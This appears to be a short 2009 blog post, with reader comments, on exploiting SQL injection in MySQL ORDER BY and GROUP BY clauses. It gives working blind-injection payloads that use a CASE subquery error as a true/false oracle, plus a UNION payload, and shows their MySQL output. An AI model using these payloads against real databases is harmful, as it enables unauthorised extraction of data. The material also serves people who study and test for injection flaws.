Exploiting SQL Injections when the input goes in the order by clause, is a bit tricky as after 'order by' clause union queries are not permitted. The following could be used in such scenario to form blind sql injection cases:
mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;
+——+
| id |
+——+
| 1 |
+——+
1 row in set (0.00 sec)
—-
mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row
—–
For injections where user's input goes to the group by clause, union queries can be used although the above technique will also work for blind injection examples: mysql> select id from news where id =1 group by id union select 2222;
+——+
| id |
+——+
| 1 |
| 2222 |
+——+
2 rows in set (0.00 sec)
8:59 pm on April 15th, 2009
Great. Thats exactly what I was searching for.
Not so great: I do not understand what the example should do…
8:32 am on April 16th, 2009
what version of the mysql are you trying this?
I think this doesnot work in some of the recent versions
10:07 pm on April 16th, 2009
Server Version: 5.1.30
I meant especially the “order by”-case.
What happens is exactly the shown reaction. What does that error tell me (regarding the injection)?
3:00 pm on April 17th, 2009
This is how, you can convert this into standard true and false responses. Think of that error as a ‘false’ response which you get when doing boolean injection;
e.g. id=100 and 1=1; id=100 and 1=2;
—-
2:34 pm on April 21st, 2009
of course -.-’
Thank you.